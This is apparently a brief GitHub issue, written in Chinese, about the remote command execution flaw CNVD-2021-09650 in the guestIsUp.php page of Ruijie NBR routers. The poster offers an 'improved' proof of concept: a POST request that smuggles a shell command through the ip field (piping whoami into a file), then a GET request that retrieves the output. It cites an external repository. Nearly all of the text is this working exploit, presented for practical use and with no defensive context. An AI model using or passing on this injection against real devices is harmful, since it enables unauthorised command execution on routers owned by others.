cloud-jie opened this issue 2 years ago · 0 comments
锐捷 NBR 路由器 guestIsUp.php 远程命令执行漏洞 CNVD-2021-09650 实战发现,给出的poc效果不佳,将poc换成如下,效果更好
POST /guest_auth/guestIsUp.php mac=1&ip=127.0.0.1|whoami>tmp5.txt
GET /guest_auth/tmp5.txt
来源 :https://github.com/MzzdToT/CNVD-2021-09650